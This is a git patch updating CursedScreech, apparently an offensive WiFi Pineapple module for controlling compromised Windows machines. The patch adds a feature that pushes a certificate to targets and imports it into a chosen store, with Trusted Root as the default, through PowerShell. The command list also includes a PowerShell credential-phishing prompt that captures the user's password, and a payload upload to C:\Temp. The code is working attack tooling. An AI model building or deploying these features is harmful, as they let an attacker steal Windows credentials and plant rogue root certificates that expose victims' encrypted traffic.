From 78163214eb2b521524b7610c9e5e74eeb41deddc Mon Sep 17 00:00:00 2001 From: sud0nick Date: Fri, 5 Jan 2018 23:07:00 -0500 Subject: [PATCH] Update 1.3 --- CursedScreech/api/module.php | 8 +-- CursedScreech/includes/changelog/Version 1.3 | 5 ++ CursedScreech/includes/forest/ezcmds | 1 + CursedScreech/includes/forest/target.py | 2 +- CursedScreech/includes/scripts/testEncrypt.sh | 2 +- CursedScreech/js/module.js | 55 +++++++++++++++++-- CursedScreech/module.html | 19 ++++++- CursedScreech/module.info | 4 +- 8 files changed, 81 insertions(+), 15 deletions(-) create mode 100644 CursedScreech/includes/changelog/Version 1.3 diff --git a/CursedScreech/api/module.php b/CursedScreech/api/module.php index 8791a25..de21987 100755 --- a/CursedScreech/api/module.php +++ b/CursedScreech/api/module.php @@ -422,7 +422,7 @@ class CursedScreech extends Module { $files = scandir(__API_DL__); $success = true; foreach ($files as $file) { - if ($file == "." || $file == "..") {continue;} + if (substr($file, 0, 1) == ".") {continue;} if (!unlink(__API_DL__ . $file)) { $success = false; } @@ -449,7 +449,7 @@ class CursedScreech extends Module { $files = []; foreach (scandir(__PAYLOADS__) as $file) { - if ($file == "." || $file == "..") {continue;} + if (substr($file, 0, 1) == ".") {continue;} $files[$file] = __PAYLOADS__; } $this->respond(true, null, $files); @@ -521,7 +521,7 @@ class CursedScreech extends Module { $dir = ($type == "error") ? __LOGS__ : (($type == "targets") ? __TARGETLOGS__ : __CHANGELOGS__); $contents = array(); foreach (scandir($dir) as $log) { - if ($log == "." || $log == "..") {continue;} + if (substr($log, 0, 1) == ".") {continue;} array_push($contents, $log); } $this->respond(true, null, $contents); @@ -575,7 +575,7 @@ class CursedScreech extends Module { $keys = scandir($dir); $certs = array(); foreach ($keys as $key) { - if ($key == "." || $key == "..") {continue;} + if (substr($key, 0, 1) == ".") {continue;} $parts = explode(".", $key); $fname = $parts[0]; diff --git a/CursedScreech/includes/changelog/Version 1.3 b/CursedScreech/includes/changelog/Version 1.3 new file mode 100644 index 0000000..9d5c0de --- /dev/null +++ b/CursedScreech/includes/changelog/Version 1.3 @@ -0,0 +1,5 @@ +January 5, 2018 +

+ - Modified hook into Papers to work with the latest release
+ - Added ability to install a certificate on a target Windows machine
+ \ No newline at end of file diff --git a/CursedScreech/includes/forest/ezcmds b/CursedScreech/includes/forest/ezcmds index 358600a..11b2bf9 100755 --- a/CursedScreech/includes/forest/ezcmds +++ b/CursedScreech/includes/forest/ezcmds @@ -1,4 +1,5 @@ Send File:C:\Temp\ +Install Cert:powershell "Import-Certificate -FilePath $cert -CertStoreLocation $store" Get PS Version:powershell "$PSVersionTable" Get SysInfo:powershell "gwmi Win32_QuickFixEngineering | Select Description, HotFixID, InstalledBy, InstalledOn; gwmi Win32_OperatingSystem | Select Caption, ServicePackMajorVersion, OSArchitecture, BootDevice, BuildNumber, CSName, CSDVersion, NumberOfUsers, Version | FL" Windows PSv3+ Phish:powershell "Get-Credential -User $(whoami).Split('\')[1] -Message 'Windows requires your credentials to continue' | % {Write-Host $_.UserName '->' $_.GetNetworkCredential().password}" diff --git a/CursedScreech/includes/forest/target.py b/CursedScreech/includes/forest/target.py index e79eb7e..07900ba 100755 --- a/CursedScreech/includes/forest/target.py +++ b/CursedScreech/includes/forest/target.py @@ -14,7 +14,7 @@ with open(settingsFile, "r") as sFile: if params[0] == "activity_log": activity_log = params[1] elif params[0] == "kuro_key": - priv_key = params[1] + ".pem" + priv_key = params[1] + ".key" pub_cer = params[1] + ".cer" elif params[0] == "target_key": client_key = params[1] + ".cer" diff --git a/CursedScreech/includes/scripts/testEncrypt.sh b/CursedScreech/includes/scripts/testEncrypt.sh index 10821e1..bffb14f 100755 --- a/CursedScreech/includes/scripts/testEncrypt.sh +++ b/CursedScreech/includes/scripts/testEncrypt.sh @@ -23,7 +23,7 @@ while [ "$#" -gt 0 ] do if [[ "$1" == "-k" ]]; then - KEY="$2.pem" + KEY="$2.key" fi if [[ "$1" == "-d" ]]; then KEYDIR="$2" diff --git a/CursedScreech/js/module.js b/CursedScreech/js/module.js index 0b7cd89..2349b2c 100755 --- a/CursedScreech/js/module.js +++ b/CursedScreech/js/module.js @@ -51,6 +51,22 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter $scope.newCmdName = ""; $scope.newCmdCommand = ""; $scope.checkAllTargets = false; + $scope.target_installKey = ""; + $scope.certStores = [ + {"ID":"Root", "Name":"Trusted Root Certification Authorities"}, + {"ID":"My", "Name":"Personal"}, + {"ID":"Remote Desktop", "Name":"Remote Desktop"}, + {"ID":"Trust", "Name":"Enterprise Trust"}, + {"ID":"CA", "Name":"Intermediate Certification Authorities"}, + {"ID":"SmartCardRoot", "Name":"Smart Card Trusted Roots"}, + {"ID":"TrustedPublisher", "Name":"Trusted Publishers"}, + {"ID":"TrustedPeople", "Name":"Trusted People"}, + {"ID":"ClientAuthIssuer", "Name":"Client Authentication Issuers"}, + {"ID":"eSIM Certification Authorities", "Name":"eSIM Certification Authorities"}, + {"ID":"Windows Live ID Token Issuer", "Name":"Windows Live ID Token Issuer"}, + {"ID":"Homegroup Machine Certificates", "Name":"Homegroup Machine Certificates"} + ]; + $scope.selectedCertStore = $scope.certStores[0]; // Panes $scope.showTargetPane = true; @@ -62,6 +78,7 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter $scope.uploading = false; $scope.selectedPayload = ""; $scope.showPayloadSelect = false; + $scope.showCertSelect = false; // Interval vars $scope.stop; @@ -313,6 +330,8 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter if ($scope.showPayloadSelect) { // ex: "sendfile;/pineapple/modules/CursedScreech/includes/payloads/NetCli.exe;C:\Temp\" cmd = "sendfile;" + $scope.payloadDir + $scope.selectedPayload.fileName + ";" + $scope.targetCommand; + } else if ($scope.showCertSelect) { + cmd = "sendfile;" + $scope.target_installKey + ";" + getEZCmd("Send File"); } else { cmd = $scope.targetCommand; } @@ -321,7 +340,23 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter action: 'sendCommand', command: cmd, targets: checkedTargets - },function(response){}); + },function(response){ + + // Make a second API call to install the certificate + if ($scope.showCertSelect) { + + cmd = $scope.targetCommand.replace("$cert", getEZCmd("Send File") + $scope.target_installKey.split("/").slice(-1)[0]).replace("$store", "'Cert:\\LocalMachine\\" + $scope.selectedCertStore.ID + "'") + + $api.request({ + module: 'CursedScreech', + action: 'sendCommand', + command: cmd, + targets: checkedTargets + },function(response){}); + + } + + }); }); function getTargetIndex(sock){ @@ -458,23 +493,27 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter }); $scope.ezCommandChange = (function(){ + $scope.showPayloadSelect = false; + $scope.showCertSelect = false; if ($scope.selectedCmd === null) { $scope.targetCommand = ""; - $scope.showPayloadSelect = false; return; } for (key in $scope.ezcmds) { if ($scope.ezcmds[key] == $scope.selectedCmd) { if (key == "Send File") { $scope.showPayloadSelect = true; - } else { - $scope.showPayloadSelect = false; + } else if (key == "Install Cert") { + $scope.showCertSelect = true; } } } $scope.targetCommand = $scope.selectedCmd; }); + function getEZCmd(key) { + return $scope.ezcmds[key]; + } /* ============================================= */ /* BEGIN KEY FUNCTIONS */ @@ -484,9 +523,15 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter if (type == "kuro") { $scope.selectKuroKey = true; $scope.selectTargetKey = false; + $scope.selectInstallKey = false; } else if (type == "target") { $scope.selectTargetKey = true; $scope.selectKuroKey = false; + $scope.selectInstallKey = false; + } else if (type == "install") { + $scope.selectInstallKey = true; + $scope.selectKuroKey = false; + $scope.selectTargetKey = false; } $api.request({ module: 'CursedScreech', @@ -509,6 +554,8 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter $scope.settings_kuroKey = keyPath; } else if ($scope.selectTargetKey == true) { $scope.settings_targetKey = keyPath; + } else if ($scope.selectInstallKey == true) { + $scope.target_installKey = keyPath + ".cer"; } }); diff --git a/CursedScreech/module.html b/CursedScreech/module.html index d39ea37..783e293 100755 --- a/CursedScreech/module.html +++ b/CursedScreech/module.html @@ -234,14 +234,27 @@ $(document).on('mouseenter', '.cs_hoverDanger', function() {
-
+

Remote upload path

-
+
+
+
+ +
+
+ +
+
+

Certificate Store

+ +
+
@@ -397,7 +410,7 @@ $(document).on('mouseenter', '.cs_hoverDanger', function() {
- + diff --git a/CursedScreech/module.info b/CursedScreech/module.info index 7c83c87..54cdc2a 100755 --- a/CursedScreech/module.info +++ b/CursedScreech/module.info @@ -6,5 +6,5 @@ "tetra" ], "title": "CursedScreech", - "version": "1.2" -} \ No newline at end of file + "version": "1.3" +}